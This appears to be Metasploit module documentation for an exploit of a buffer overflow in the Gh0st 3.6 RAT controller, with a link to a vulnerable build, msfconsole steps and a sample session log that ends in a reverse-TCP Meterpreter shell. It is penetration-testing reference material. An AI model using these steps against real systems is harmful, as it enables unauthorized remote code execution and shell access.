h00die
43 lines
1.2 KiB
Markdown
43 lines
1.2 KiB
Markdown
## Vulnerable Application
|
|
|
|
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.
|
|
This vulnerability can allow remote code execution in the context of the user who ran it.
|
|
|
|
A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)
|
|
|
|
## Verification Steps
|
|
|
|
1. Run the application
|
|
2. Start msfconsole
|
|
3. Do: `use exploit/windows/misc/gh0st`
|
|
4. Do: `set rhost [ip]`
|
|
5. Do: `exploit`
|
|
6. Get a shell
|
|
|
|
## Options
|
|
|
|
**MAGIC**
|
|
|
|
This is the 5 character magic used by the server. The default is `Gh0st`
|
|
|
|
## Scenarios
|
|
|
|
### Windows XP SP3 with gh0st 3.6
|
|
|
|
```
|
|
msf > use exploit/windows/misc/gh0st
|
|
msf exploit(gh0st) > set rhost 192.168.2.108
|
|
rhost => 192.168.2.108
|
|
msf exploit(gh0st) > exploit
|
|
|
|
[*] Started reverse TCP handler on 1.2.3.4:4444
|
|
[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6
|
|
[*] 1.2.3.1.108:80 - Spraying heap...
|
|
[*] 1.2.3.1:80 - Trying command 103...
|
|
[*] Sending stage (956991 bytes) to 1.2.3.1
|
|
[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400
|
|
[*] 1.2.3.1:80 - Server closed connection
|
|
|
|
meterpreter >
|
|
```
|